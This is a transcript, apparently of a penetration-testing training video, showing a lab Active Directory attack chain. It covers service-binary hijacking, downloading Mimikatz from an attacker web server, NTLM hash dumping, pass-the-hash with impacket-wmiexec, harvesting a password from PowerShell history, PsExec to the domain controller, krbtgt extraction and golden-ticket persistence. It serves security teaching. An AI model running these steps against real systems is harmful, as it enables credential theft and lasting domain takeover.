password then once this is run we're gonna run net local group and we're going to try to log or add the user Mighty into the administrator's group right so this is the way you would do it if you were an admin on a box you would type those commands in order to add another admin now you might notice that I don't have any slash domain here now if I for example log in as a domain admin and I run the same command but I do slash domain I'm actually going to add a user to active directory and I could essentially do net group domain admins and add myself there because you have the power to do that as a domain admin right the problem here is that the service the MySQL the service we talked about is not running in the domain context it's running on the local box on Weber 2. so this is not going to be a domain user but hopefully it's going to be a local user that is being added to the administrator's group right okay so we're going to save this as ADD user.c right like this and if I do LS add user see here now we can see that we only have ad user.c file which contains our source code now we need to compile this because we need an exe file and we can do this pretty simple with a cross compiler in Cali which is installed by default as well I'm going to use x86 Ming w32 here in GCC this is often used to compile exploit code for example or create you know simple Windows executables as we're doing here right this is used quite a lot by penetration testers and the only thing we need to do is to feed it the the source code or the C code we have here and specify an output file so in this case the output file let's go with ADD user.exe and no errors this is I'm not a program grammar by the way and this is almost a record for me because always when I try to compile my own code it's just a bunch of errors and warnings I used to like get rid of errors and I don't really care about the warnings right but in this case it worked uh let's do LS add user and a wildcard again and we can see 
that we have we have the C file we can delete that now we don't need it anymore but more importantly we have the address exe file so we need to transfer this over to Windows somehow now to the rebel 2 server right now there are many ways to do this uh in one of our courses we we actually have modules on file transfers right there are so many ways we can do this we could set up an FTP server on Cali and kind of tap into that from from Windows we can set up SMB share what I personally like to do is to use a web server because from the available 2 client we should be able to reach our calendar machine anyway and if we set up a web server it's so easy to just download files using Powershell for example right I'm going to clear the screen and I never remember my IP address so I'm gonna do ifconfig eth0 and this is the IP address on my Cali attacking machine and if I set up a web server here now I should be able to reach it using this IP right to set up web server we'll use Python 3 we can also use Python 2 for this but I'm trying to you know be a good boy yeah be a good boy and we're just gonna use the HTTP server module and we're just gonna serve this on Port 80 right so like this now it's currently serving on all interfaces including it h0 and we should be able to to copy this and go into the Windows machine and get that user.exe file so I'm going to open command prompt again hostname we are still on level two as Michael I'm going to create a file well actually I'm going to create a folder so we're going to create a folder called pen test if I do a let's say now the well actually I need to move into the folder as well and if I do LS the folder is empty right now with Powershell we can for example invoke web request right it's a very simple way iwr short for invoke web request you can point point to a URI and we will just type HTTP or IP address for Cali slash add user.exe because we are currently serving our pen test foldering Cali right the out file let's just call 
it at user.exe for now eventually we need to rename the file to match the the service we're going to try to take over right but for now add user.txt we do LS and we do have the file here so our malicious file is now in place on the Windows machine the only thing that is left to do now is to Simply replace the file uh the MySQL D file and try to start the service again what I like to do if I'm allowed from the client to do this I always take a backup of the original file anyway right so we're going to go ahead and move the file in MySQL or XM MySQL bin and MySQL D dot exe to the current working directory we can call it backup MySQL D dot exe right if you do this this this allows us to replace the file again later with the original one and then the SQL Server should should start up again right what we need to do now we need to add the add user.exe to the original location of the MySQL D dot exe and restart the service so in this case I'm going to remove an in the current working directory we have the address exe we're going to move it to the C column xampp MySQL bin and this is where we can rename it we can either renamed it earlier as well but but I just like to do it this way we need to do it correctly if you have a typo here that the service is not going to start right so my that was a typo right away MySQL d dot exe sounds like a human man yeah I think I hope this is correct it looks correct right MySQL d dot exe Okay cool so we do this we didn't get any errors because we are built-in user uh with full access to to this file so we we are able to do this even though the service was running right yeah the service is still running the executable is used to start the service and this service should probably still work I mean it might depend a little bit but I know that it's gonna crash completely when we try to restart it at least right yes let's go ahead and do our next stop my sequel that's the service name and you know as usual penetration testing we have another 
obstacle here access is denied we can argue that this is something we should have checked beforehand or be in fact able to restart this service and we should have probably checked that right right I mean what kind of options do we have we have Mario that is logged in on the machine we don't necessarily want to lose Mario right I was gonna say you could reboot but then you're going to lose it right yeah either real world you would maybe not in Remy's lab right we'll see so we're going to try to simulate this as good as possible like in the real world now you could potentially social engineer someone into logging in and starting in the service that that might be a little bit uh you know unrealistic or we could social engineer an admin to go in and restart the service we can say it's Crash store or something like that maybe we could even contact Mary hey can you do a restart on the machine and we we call Mario oh yeah of course of course the f I can do a restart here and I'll just continue my work later and she's going to log back in again and we're gonna be admin and everything is just cool right so hopefully that's going to be the case here we'll see now I'm gonna run another command here so again we're running net or get net Sim instance same as before but in this case we are targeting the MySQL service itself and instead of looking at name and stuff like that we're going to look at the start mode for the service because we want to see okay how does this service actually start and the start mode is automatic this means that if the server restarts the service is also going to start running our malicious call the only option we have in this case would be to restart it ourselves but we don't even know if we have permissions to restart the server right maybe we need to brute our brute force ourselves into their server room and kind of just knocking out the server and you know click the button who knows but in this case I actually found a really cool way to find out 
whether or not we can restart the server I found this yesterday and I I have never used this before we can do restart computer in um in Powershell right and we can just run this and see okay are we able to restart but if we add what if here this is this is pretty cool so it's not going to run a restart computer but it's going to tell us okay what happens if I run this Command right the what if here is it's going to perform the operation which is in quarter enable the local shutdown access rights and restart the computer on target localhost yeah On Target low gloss the web O2 right so if we run this it's simply gonna restart another way of finding out whether we have the option or not is to do who am I slash priv and we can have a look for the SE shutdown privilege here right so we can use the the shutdown privilege here it's currently disabled but this is just because it's not in use right now right so the fact that this even shows up in this list tells me that I am able to restart the computer so let's just do this with Powershell restart computer boom and it's restarting now if we go back to the original tab we can see that we disconnected from Michael we're not connected to Weber 2 anymore which makes sense because the server went down right so now we may have to wait a little bit and while the server restarts and we could log back into Michael and check if our Mighty user is there or we can simply just try to log in as mighty right with a username and a password we had so we can log in with X3 RDP again with the user Mighty with a password to the same machine but in this case we are not specifying the corp.com domain right because we don't have a domain user but hopefully this one is going to be a local admin on the machine that was the account that you created with your C program right correct yeah so let's just cross our fingers and hope that this worked it's highly theoretical it seems like we're getting something here at least let me maximize this we are 
getting windows we are taken to something called or taken to something called the server manager and yak we don't we don't need this graphical stuff so I'm just gonna go ahead and start command prompt again I'm gonna now right click the command prompt and hope that I can just bypass this USC right without credentials and we can see here we are not asked for credentials we can simply type yes and we should now be in a high integrity label or level on this machine so we can do who am I we are Mighty and this also further illustrates that we are not the part of the domain right we are logged in directly on demo 2. if I do here are my groups and this is where it gets uh you know interesting right looking at this bad boy right here we are a part of the built-in administrators so we just escalated our privileges using a service that was misconfigured by the sysadmin it had nothing to do with xampp really that there is no vulnerability there in that version as far as I can tell at least for permissions but the C submin did a poor job here right doing this kind of stuff we escalated our privileges that's cool let's go back to our documentation and the attack path if if you are admin we're going to try to steal Mary's credentials now in the real world we re I mean we rebooted this machine Mary might not be logged in anymore but in Remy's lab she is she's automatically logging in her for the purposes of the the proof of concept we want to show here but in the real world now you would probably try to monitor this machine a little bit and once someone logs in there you can use your admin user and try to steal their credentials and now we are kind of slowly going into the active directory portion of the of the of the call again right I'm now going to go ahead and clear the screen I'm going to go into the C column users directly or directory and the mighty folder we have our own profile here now I'm gonna create a new folder called pen test so we created a new folder called pen 
test let's move into it and we do Powershell I just like Powershell so much because I can do control L and this happens it's just it's just so fantastic and it also supports LS right exactly I'm so used to so in this photo bit we have nothing and finally we are gonna dive into a little bit of mimikats actually many of the viewers probably heard about mimikas before if you're into penetration testing and this is the tool we're gonna use to to hopefully do some magic here I'm gonna try to explain as detailed as possible what we're gonna do but the first thing we need to do is to actually download it right we have our pen test folder shared on our Python 3 web server so um do I remember my IP I actually think I do that would be that would be rather crazy so we are serving mimikats in a pentas folder and the out file we can just call it mimical series well mimicats dot exe like this this is a little bit bigger so it's going to take a little bit more time to download um there we go if you do a lesser here now we have a mimic at CXC on the machine right we're gonna start well actually we can keep it like this for now we're gonna have to do a little bit of theory before we move on now we're going to use this tool called mimikats and we're essentially gonna tap up into a process or the memory of a process called Elsas this one also has a really complex name such as eye cackles earlier it's actually the local security Authority subsystem service and their lord what uh what a complex thing I'm just going to refer to this data as Elsa's right in active directory we have two main authentication methods we have Kerberos which is the default and it was released I think in 2000 has been the default ever since and we also have something called ntlm authentication which is also enabled by default in in active directory it can be disabled but based on my experience in penetration testing and to submin it's just there right it just works and you know it works with the older 
applications the third party application Etc if Kerberos isn't available for example ntlm is just gonna come in and save the day right however ntlm is rather insecure right now I I don't necessarily need to dive too deep into the technical details here and this might just be my opinion but when you obtain access to an mtlm hash for a user somehow which we're going to show in a coupler hopefully right you can use that hash to gain access to whatever that user also has access to right you don't need their password you can do something called opacity hash attack and that's just such a nasty attack to be honest like it's really cool as a pen tester once you get access to a to ntlm hash then you can use it like that but it's not really good for for security right if you want to protect your environment I would say that's probably one of the most insane well not insane but scary parts with ntlm so if you get the hash you don't need authentication you can just go straight in right you need to authenticate but you can just use the hash to authenticate here you don't need a password anymore so like a cookie on a session or something essentially yeah and you can set a strong password like super strong password but the ntl image is still just gonna let you in right so yeah but the password strength doesn't really matter too much if you use that authentication mechanism right Kerberos is is different and we have a whole module in pen 200 that explains this but essentially Kerberos is air balls around the issuance of tickets and the usage of tickets for authentication purposes right we can give a really quick and high level overview over the two but the default is Kerberos so if you use Kerberos you sit down at your computer your Windows computer I mean it can also be a Linux computer but we are focusing on Windows here you log in with your username and your password right and you you essentially do the same for ntlm as well you you you you will come in with your credentials in 
order to authenticate to the domain or other resources in the domain right yeah so you type your password then the the client is going to send something called the authentication server request and this is going to sound a little bit maybe crazy technical if you haven't heard about Kerberos before but the authentication so request as Rec is being a like Ace Rec for short right is being sent to the KDC which in most cases runs on a domain controller and KDC stands for key distribution center now we can call this a package or let's call it a request right we can just call it request for short and this request contains a timestamp which is encrypted using the hash which is derived from the password of the user logging in then the domain controller is going to receive this request and since the domain controller has access to all the password hashes it's going to look into its own okay where is the password hash for Michael for example right and it's going to try to decrypt the timestamp using the same hash and if those are matching authentication is successful right at that point the domain controller is going to reply to the client with something called authentication server reply or as rep and this contains the the juice information we are after it contains a session key and something called a ticket granting ticket and the session key is encrypted with the user's password but the tdt itself is is the real interesting part here this can takes information about the user such as the username what groups the users has access to for example so if you're a domain admin that's going to be reflected in the TGT and the TGT is also encrypted using the secret key which is the ntlm hash for the krb tdt account I talked about earlier the very super important account in active directory and the capability is only known to the KDC right after this the client or the user essentially showed the ticket to the KDC whenever it wants access to our resource right so let's say for 
example, user Michael logs into the domain and he wants to RDP to the WEB02 machine. Michael's computer is going to send a ticket granting service request to the KDC, requesting a service ticket. Then the KDC is going to verify... well, it's going to send a request for a TGS, right. The KDC is going to verify the TGT to make sure it's valid, and if it's valid, it's going to send a service ticket back to Michael's computer. Then essentially Michael's computer is going to send this service ticket to the WEB02 machine, WEB02 is going to decrypt the ticket, verify the access permissions, and let him log in. So that was Kerberos explained. I'm going to briefly explain NTLM as well. This is more of a challenge-response kind of thing. So when Michael, for example, logs into his client, the client is going to calculate his NTLM hash based on the password, and it's going to be stored in memory on the client. The client is then going to send the username to the server where Michael wants to connect; let's say this is WEB02 again as an example. The server is then going to respond with a challenge, which is just a random value. The client is going to receive this challenge, encrypt the challenge using the NTLM hash based on Michael's password, and send this back, and this is known as the response. Then WEB02 is going to receive this, and it's going to forward the response itself, the username, as well as the challenge to the domain controller, or the DC. The DC, as always, has access to everything in the kingdom. It's going to look up the NTLM hash for Michael stored in Active Directory, it's going to try to encrypt this challenge itself using the stored NTLM hash for Michael, and then compare the challenge it encrypted itself with the response it got from Michael. If those match, the DC is going to confirm the authentication and the server is going to be, you know, granted access. Okay, so now we have a little bit of
background information, Kerberos versus NTLM. And when exactly is NTLM used?

Yeah, I've seen NTLM used in so many enterprises during my penetration testing. It's actually kind of crazy, but there's nothing wrong with it really; you would probably try to get away from it at some point. But if a user authenticates to an IP address instead of a hostname, for example, NTLM authentication is used. If a user authenticates to a hostname which is not registered in the AD-integrated DNS server, NTLM is used. Third-party applications often use NTLM as well. It's very easy to set up NTLM authentication in, for example, a web app; I've been there, done that. I'm struggling with that these days actually, by the way, to get Kerberos running properly. But yeah, we find it a lot, and if you are a sysadmin and you kind of want to get away from NTLM and only use Kerberos, make sure that you plan everything accordingly, because systems might break. They might not be compatible with Kerberos, for example. Do it during a maintenance window after careful planning and really mapping out your environment. You just don't want to go somewhere and say, hey, we're just going to disable NTLM and see what happens. In my domain it would probably be fun because I only have six machines, but a normal domain is usually a little bit bigger than this.

So right now we're going to go back to our command prompt here. Whether it's tickets or hashes in memory, I don't really care too much, because hopefully when we tap into the LSASS memory, under the right circumstances we will be able to get both tickets and hashes. Hashes are just easier to use in my opinion, so we're going to focus on hashes for now and get into tickets a little bit later. I mentioned LSASS; that's a process that functions as a part of the operating system, Windows in this case, and it's the process that maintains and enforces security policies, authentication, and that kind of
stuff, and both tickets and NTLM hashes may be stored there. Let's stop with the theory and get back to, you know, the hacking. So I'm going to start Mimikatz here. Thank you, AV, for not catching this. Mimikatz is going to be caught by AV or EDRs if you use this on a normal penetration test. Talk with the client beforehand and see if you can whitelist something, or if you're into it you can try to bypass AV as well, but that's not really what we are covering here. We are working in an open field, learning the basics.

In your advanced courses you cover some of that, AV evasion, is that right? Or is it the PWK?

That's correct. We have a module in PEN-200 as well for AV evasion, and the techniques we show there might actually work in this scenario. We have some really cool techniques there that allow you to bypass Defender, for example, and that kind of stuff, but you go much deeper into that when we get to PEN-300, for example. AV evasion can really be tricky, but it's all logic, right? So you just need to kind of sit down with it and learn it, and that's pretty much it.

So we're going to start Mimikatz, and this is how it looks. Looks awesome, right? No graphical stuff or anything, it's just text. We can see the developer here, we have the version. This is just a fantastic tool when it comes to pentesting on Active Directory. We also have a reference to something called PingCastle. I just want to mention this briefly: I actually used PingCastle quite a lot when I was doing pentesting. It's a really great enumeration tool for Active Directory. You literally download it, you run an exe file, it's going to gather a whole bunch of data for you and present it to you in a report. It might even find some nice vulnerabilities. Yeah, I like the tool. Anyway, we're not focusing on enumeration, we're going to focus on something else: we're going to try to get that Mary hash, finally. I'm going to type a
command here and explain a little bit what it does. We're going to run something called privilege::debug, and this is essentially going to enable the SeDebugPrivilege. It's going to allow the process we are running in here to access certain system-level resources. Essentially we need to run this to be able to dump LSASS memory and extract hashes, so it's just a command we need to run here; we don't need to know exactly what is going on under the hood. We can see that the privilege is OK. The only thing we need to do now is to tap into this process and try to get the logon passwords. Mary is logged in here, and hopefully she has a logon password stored in memory. To do this we're going to do sekurlsa::logonpasswords, so we are now essentially tapping into this LSASS process (LSA, Local Security Authority, is the name for that one), and this is going to give us probably a lot of output. So let's try, and the terminal goes kind of crazy here. We saw a lot of text fly past our screens, and we have more down here. Now, this is dumping every single hash on the machine. For example, the username WEB02: this is probably the hash for the machine account in Active Directory for WEB02, and we don't necessarily care too much about it. We can also see a username DWM-1 here, the window manager, so this has nothing to do with corp.com, and we are interested in Mary from corp.com. So we will just have to do some scrolling here until we find it, and here we go. Actually we can see here that we have an authentication ID, we have a session, and we have the username Mary. This is what we're after. We can see the domain as well, CORP, and the logon server is DC01. We even have her logon time, and if you look at the logon time compared to the reboot, it seems like she logged in pretty much right away after the reboot. Thank the Lord for that, right? We need to trust in some magic from time to time.

Yeah, I mean in the real world you would have just waited,
but I mean obviously a lab speeds things up, because otherwise there's no point waiting around.

Yeah, I would make sure to monitor this machine, the WEB02 machine, like crazy all the time to see if anyone logs in there, because once someone logs in you might be able to get their NTLM hash, as we're doing here. We can see the NTLM hash here for Mary, and this is everything we need to impersonate the user. I'm going to go ahead now and just copy this, and I'm actually going to minimize Windows, and we're going to look at a possible lateral movement technique. So we're going to do this from Kali. I'm going to start a new terminal here; I think this might be good, we'll see how the output is going to look. We're going to use something called wmiexec from Impacket. This is a tool installed by default in Kali. I'm going to show the help syntax for it; I think it's /usr/bin/impacket... let's see, impacket-wmiexec. There are a lot of tools there. WMI can be used by sysadmins to remotely manage systems, right, like the same with CIM; it can be used to do certain things. In this case we see the usage here. We have a target, this is important, so we can use domain/username, we can supply a password, and we do @ target name or IP address. More importantly, if we look a little bit further down here, it supports hashes, LM hash and NT hash, and we have an NT hash here. So we essentially need to use impacket-wmiexec, we want to use the hashes authentication, we supply Mary's hash, her username, and the IP we want to connect to, which in this case is going to be FILES02, a new server. So let me clear my screen: /usr/bin/impacket-wmiexec -hashes, and we are not going to use the LM part, we're going to use the NTLM, and yes, it was on my clipboard, CORP/Mary@ the IP address. So we need the IP address for FILES02 now. We can go back to our documentation and find it; this is the IP, so let's copy it. I just paste it in there. Now
we need to keep our fingers crossed and hope that this is going to work, because there are some prerequisites for this to work. We need port 135, I believe it is, to be open on the target, which is often the case in a domain environment like this. We also need to be a domain admin... no, I'm sorry, we obviously don't need to be a domain admin, we need to be a local administrator on the machine, and as we have seen, a local administrator can be a domain user or a local user. This is also relatively common, and we have been able to compromise Mary, who according to our enumeration is an admin on FILES02. So let's launch this and see what happens, and we can see that we are indeed getting a prompt. Now, in this case we used wmiexec; we could have used a bunch of other tools as well. We could probably use Metasploit, which has some modules that support hashes, Mimikatz itself, Evil-WinRM, CrackMapExec and so on. This is just one example. If I do hostname, it's a little bit laggy now, but essentially we see that we are connected to FILES02. If we do whoami, we are logged in as Mary, but we never used her password.

Right, so this is the example of using the NTLM hash that you collected and just bypassing all the authentication.

Yeah, so this is known as the pass-the-hash technique, and no matter how complex a password Mary would have here, we would still be able to log in with our hash. So it's kind of scary.

And you used Mimikatz just to grab that from memory or something, because you logged into the machine?

Right, yeah. So from WEB02, where Mary was logged in, we tapped into the memory and we extracted her hash, essentially.

That's right, yeah.

But it requires local admin access, so you want to know your privilege escalation techniques, and you want to make sure that you do as much as possible with the lateral movement techniques and the users you get. You want to
get to know them and see, okay, what can I do with this user here and there.

It's a great demonstration, because, what is it, was it Michael, the original user, that RDP'ed into a server, and then you used some kind of dodgy software to escalate your privileges to local admin, and then you ran Mimikatz to get the hashes, and now you've just used this hash to log into another server.

Yep. So just as a recap, we can go back to our documentation on the attack paths. We start with Michael, we RDP'ed into WEB02. If we were admin we wanted to steal the credentials for Mary, which we just did, but we were not the admin, so we replaced that original mysqld file with our own malicious, nasty file. We did get the admin access and we just dumped Mary's credentials from memory on WEB02, and based on the users and groups here, Mary is a member of the local admins. So with that we have now accessed FILES02 using our new lateral movement technique called wmiexec. So far our plan is going really well; all the theory we had here actually proves to be true.

Who's that dodgy guy that built this infrastructure?

Yeah, I mean, who knows. I have to find someone to blame, so we will just blame Jeff, because he's the domain admin.

But now we are essentially coming up to this question mark, and we are now going to start exploring some territories we haven't seen before. Remember I said my goal was to get domain admin in this pentest, and with admin access to the file server, I mean, we could do a few... whoami /groups here with Mary. This is a little bit scrambled now, but we can see here that we are a part of the built-in administrators group as Mary. So on a file server in a domain you might find a lot of things. You might find home folders, which can contain God knows what, a lot of different things. You might find admin shares with scripts, or old scripts that are not used anymore, with hardcoded credentials and that
kind of stuff. Only the imagination can really stop you here. But we need to loot the system, and at this point I'm going to be really quick about this; we're not going to do any crazy escalations or anything here. We're going to have a look at the Users folder and see something that should just not happen in an environment. We can see, first of all, the local administrator has been logged in; that's fine, I'm going to forgive you as an administrator for logging into your server. But this administrator.corp, this is the domain admin himself, like the built-in actual domain admin for the domain. Just don't do this. Never browse around with your domain admin. And to make things even worse, Jeff, who is also a domain admin, has been logged in here. Imagine what can happen if, for example, one of those logs in and we are sitting here with admin access, Mimikatz ready: a domain admin logs into the box, we can dump their hash or ticket and just impersonate them somehow. In this case we don't have any logged-on sessions, but we're going to enumerate Jeff a little bit here. So I'm going to go into his folder, and we are in cmd now, so I'm going to dir, and we have access to Desktop, we have access to a lot of things. What I'm mostly interested in right now is to have a look at his PowerShell history, and that's usually stored inside something called AppData, which is a hidden folder. We don't necessarily see it here, but we can browse to it, then Roaming, if I remember correctly. Let's see, Roaming... Microsoft... spelling mistake, yeah, that's a spelling mistake, sorry about that. Roaming. I could copy and paste this as well, but I want to show that I can actually type on my keyboard. So Microsoft, Windows, PowerShell, PSReadline, yes, we actually have access to the ConsoleHost_history, which is Jeff's PowerShell history on this machine. Who knows what's there.

And that gets saved by default?

Yeah, this is the default
folder. I mean, you can turn this off and everything, but this is the default setup. I haven't touched any of the default settings in Windows here; this is as default as it gets. So if he has logged into this machine and done some fancy stuff in PowerShell, this is by default where we're going to find it. So let's copy this and we're simply just going to type it to the terminal. Obviously this is a little bit fabricated for the demo, but we can see Jeff has been doing some really strange stuff here. It seems like he's doing some trusted hosts stuff with the domain controller, he's testing a WinRM config integration towards the DC, and it seems like he's trying to log in. We have a username here that Jeff typed in, we have a really strange variable PWD, I don't know why I put that there, but we can see a password here which says "I need OCP now 123", and I would absolutely agree with Jeff in this setting. Like, Jeff, you need OCP, you need to get your stuff together, man, you shouldn't be working as a system admin if this is the case.

So there's a credential stored in history. But I mean, this kind of stuff happens in the real world?

Oh yeah, yeah, I've seen this happening so many times, and one of my favorite things to look at if I see someone has been logged into a machine and I have admin access to the machine... I mean, the only reason we can see this is because we are a local admin, but then I really like to go through the PowerShell history, because you can find so many cool things there from time to time. So obviously this is sped up a little bit compared to what you will see in a normal pentest, but I wouldn't be surprised if this was the first folder I would check here, especially since I know Jeff is a domain admin; he's a prime target in this case.

So is that a password that he just typed, or is that a password that he used in a script or something?

Now, this is probably something he typed into this
PWD variable. I don't know why he did it, because in this case he could essentially do username equals Jeff, and he could do the Enter-PSSession here, and this credential prompt is going to pop up, you know, type your password or your username here, and that's going to be used in the session. So this is just a typo, yeah, being lazy, or just not being too careful about what you're doing. I would say that this is not the only or the worst mistake he did. The worst mistake he did here is to connect to this file server with this domain admin. You just should not do that; domain admin should be really, really restricted in a domain environment. Now, we don't know if this password is going to work, though, but obviously we're going to copy this, and I'm actually just going to add it to the documentation down here: Jeff, domain admin, like this, and we just copy it there so we have it handy. It should be in my clipboard as well. Based on this we could try to do some WinRM stuff, but I'm rather more interested in trying to connect to, for example, CLIENT01 using the Jeff credential. So I'm going to start a new tab here and do a little bit of copy-paste again, xfreerdp here, like this. We're now going to try to log in as Jeff, the domain admin, with the password we found, to the corp.com domain; this is the IP address for CLIENT01. Again, this is just me trying to make this look as good as possible. We hit enter and let's see what happens. Jeff here, welcome Jeff. Let's see if we get something more; this might take a little bit of time because he may not have been logged into this machine, so it has to create a profile and all of that kind of stuff. Let's go ahead and try to start cmd as administrator right away. If we are domain admin we should also be admin on the local machine, and it seems like we are. Let's zoom in: whoami, we are Jeff; whoami /groups, we are domain admin. So mission accomplished, essentially, and the attack vector has
been fairly straightforward here, but you can see this in the real world, and it's a lesson learned, especially for Jeff. Yeah, you shouldn't browse around with your domain admin; in fact, you shouldn't be a domain admin at all. In my organization he wouldn't be. So on a normal pentest, if the goal is domain admin, this would essentially be enough. You would screenshot this and show, hey, we are logged in as domain admin, we have control over the domain now, and you wouldn't necessarily do anything more. Right now we can move into a little bit more of the mindset of a malicious hacker, because a malicious hacker would probably not stop here. When you get to domain admin, that's kind of where the fun begins; you can start doing bad stuff. I really don't recommend doing this. I work as a pentester, but I kind of know how a malicious hacker would think about this, and we're going to use this domain admin for something bad. So first of all, let's go to the C:\Tools folder. I have one of those on this machine as well. Let's start PowerShell and do an ls. So on this machine I have my hacking tools, including Mimikatz, PowerView and PsExec. In this case we're actually going to use PsExec to see if we can gain access to the domain controller. Now, this also requires a few prerequisites, but we are domain admin so we should be pretty good. Let's see, PsExec, and we just point to DC01 and we want to try to start cmd.exe. This is going to take a little while, so while this is running I'll explain a little bit. For this to work, you need to be a part of the local admin group on the DC; domain admin might be that, right. The admin share must be available, but those are normally the default settings on modern systems today. Essentially what's happening here now is PsExec is trying to start the PSEXESVC.exe service on the domain controller. This is going to create a service, or spawn a service, on a remote host, which in this
case is a domain controller, and the cmd here is now a child process of PSEXESVC.exe, essentially. We also need port 445 and, I believe it is, UDP port 137 open to do this. If I do hostname... I'm not going to be able to clear my screen here and stuff, because that doesn't really work too well with PsExec, but if we do hostname, we are indeed logged into the domain controller, and if we do whoami, we are Jeff. I'm going to move a little bit into the devastating attack that I talked about earlier. Right now we have the keys to the kingdom, we are domain admin, and we should celebrate, right? This is cool. But what if we want to have some persistence here that is kind of flying a little bit under the radar? Let's say we want, five years from now, to log into this domain again as domain admin. We could try to add our own domain administrator here, but that is something that can be easily detected. If I go ahead and add the user Mighty here now and add it to the domain admins, that's probably going to be detected eventually, and that's maybe not a good idea. What I'm going to move into now is something we call the golden ticket, and this is a persistence method we also show in the PEN-200 course. This is a really, really nasty attack, and if the sysadmin is not doing something about it, you will essentially have eternal access to the domain with the highest privilege possible. What we're going to do is forge a ticket, or a TGT, and we're not going to use the KDC or the Kerberos login or anything for this; we're actually going to fake this ourselves. This TGT is going to appear to be signed by the domain's legitimate KDC itself, and we're going to encrypt the ticket with the krbtgt password hash, which is used when you log into a domain if you use Kerberos. To create a golden ticket we need the SID for the domain, that's the security identifier for the domain, and we're going to see why
in a couple here. Obtaining the SID of a domain is very simple; we could have done that with the Michael user, running whoami /groups, and we will actually see the SID for the domain. More importantly, we need the krbtgt password hash. There are two prerequisites for this to happen: we need access to the domain controller with either a local admin on the domain controller or domain admin. We're going to try to forge a ticket. We are on the domain controller, and I'm going to go to the C: drive, we're going to create a folder called pentest again, now on the domain controller, and we're going to move there. I'm going to start PowerShell, I'm going to do ls, and we have nothing there. The output might be a little bit scuffed from time to time here because of the use of PsExec, so this is just kind of what you will have to become familiar with when you work as a hacker, essentially. So first of all, we're going to download Mimikatz, because we want to dump this password hash now for the krbtgt account. It's pretty similar to what we did earlier, so let's do Invoke-WebRequest -Uri http:// and the IP for Kali /mimikatz.exe. Hopefully my server is still running. We're going to write this to mimikatz.exe on the domain controller. The output again is a little bit messed up here, but if we do dir now, or ls, we have Mimikatz on the domain controller. I don't intend to spend a whole lot of time explaining exactly what's going on here; I just wanted to, you know, show the nastiness. So I'm going to start mimikatz.exe, and we have the same prompt as before. Again, we're going to enable the debug privilege, and we get a '20' OK because we are admin; we are a domain admin here. Now to dump the hashes we're actually going to interact with this LSA process again, so we're going to do lsadump this time around, and we just want to dump the entire LSA, so we're going to do /patch. lsadump::lsa is essentially going to allow us to dump the credentials
stored in LSA. Since we are on the domain controller, we're actually going to be able to find every single user hash stored on the domain controller, including the krbtgt account, which is the one we really need now. The /patch switch is simply... I mean, I think back in the day I didn't always need this, but this is essentially going to inject a DLL into the LSASS process, and it's somewhat complex what's going on in the back there, but it's going to hook and modify certain functions, and it's going to allow Mimikatz to read the hashes without triggering errors or access restrictions and that kind of stuff. So let's just try to run this and see what happens. Now the output is not as, you know, crazy as earlier, because we don't have a lot of information here, but here for example we have the hash for CLIENT02 and CLIENT01; those are the machine accounts in the domain. If you go a little bit further up here we have the hash for Jeff, that's interesting; we don't necessarily need this, we have the password, but we could probably do pass-the-hash as well. We have the hash for the Mi user, which we haven't really interacted with in this pentest, but Mi is a user in the domain. Here we have Mary, we have Michael, we might recognize this one: this is the same hash we dumped from WEB02 earlier. Going a little bit further up, this is where the interesting thing happens. So first of all we have the SID for the domain; this is needed for the golden ticket, and I'm going to explain why in a few. I'm just going to document this and add it to the documentation, so domain SID, and we're going to get the krbtgt hash and paste that down here. So let's go back to the domain controller... this was not the domain controller, I think; where is the domain controller? Here we go. So we have the SID, we have the administrator itself, the built-in administrator account; we can get that hash as well, but more importantly we are interested in the krbtgt account, which is used to sign
Kerberos tickets. So we have every single NTLM hash from the domain here, and we're going to copy the krbtgt hash and put it in our documentation, and that's it. We don't need anything more; we don't need to do more fancy stuff on the domain controller. So I'm going to go ahead and exit Mimikatz here, I'm actually just going to do this, and we are logged in on... where are we logged in now? Let's see, I don't even remember, so many machines were compromised. hostname, okay, so we are logged in on CLIENT01 as the Jeff domain admin. Just to prove how nasty this attack is, I'm going to log out our Jeff admin, and I'm going to log back into CLIENT01 with the user Michael, which, if you remember correctly, is a low-privileged user in the domain. The only thing he can do is RDP to WEB02. We hit enter, and obviously we are able to log in; this is the first user we used earlier, and we are now logged in to CLIENT01. Let's again start cmd; we don't need any admin permissions now, so we're just going to start this as a regular user. Let's go into the C:\Tools folder where we have Mimikatz stored. I'm going to start Mimikatz now with no admin privileges. We don't even need to do any privilege::debug or anything. What we can do is purge all the tickets we have, because we probably have some Kerberos tickets there now since we're logged in. We don't necessarily need to do that, but let's do that just to be sure: kerberos::purge. So now we have zero tickets, and we're going to finally create our own golden ticket. So let's clear the screen. We're going to use the kerberos module here, and we're going to use the golden command for this. We need a legit user in the domain, which is, well, not Mighty; well, we could add Mighty as well, but Michael. We don't need a password. I mean, historically we didn't even need a valid user to do this, but since, I think, July 2022 there was a patch that requires you to have a valid user to be able to craft this ticket. But since we
don't need a password, and you have seen how easy it is to enumerate users in the domain... So, the domain: /domain:corp.com. We need to make sure that we are doing this correctly, otherwise the ticket we generate is going to be invalid. So the SID for the domain, the security identifier for this domain, is the one we found there; let's paste it. Now we're going to do the krbtgt hash, which is going to be used to sign this ticket and make it appear valid. Now we have an option. This is all you need for the ticket, by the way: we have the SID, which is easily obtainable, and we have the krbtgt hash, which is a little bit more tricky because you need access to the domain controller to get it. Now we can choose: we can use, for example, /ptt to pass this ticket as-is into our current session, which is what we're doing in the course if I remember correctly, but we can also create a file with the ticket that we can store and, you know, have on our USB stick or whatever for a long time. I don't recommend doing this if you're a pentester; you just don't, there is no reason to do this. But I'm going to point this to a ticket called Corp golden, so this is going to generate a file in the Tools folder called Corp golden. Let's see if this works. "Missing user argument", I have a typo here; let's just do this again, /user, not two u's anymore, with one u as well there, so /user:Michael. Let's try, and we can see "Final Ticket Saved to file". This would probably work even if we had some typos and stuff, but we need to make sure that everything is correct. We have the user Michael, domain is corp.com, no typos there, we have the SID for the domain, user ID 500. I guess many of the viewers have seen this before, but this 500 is actually for the built-in administrator in the domain, so we are kind of saying, hey, I'm the admin. We have a bunch of groups as well; those are all high privileged. We could choose which group this ticket should appear to
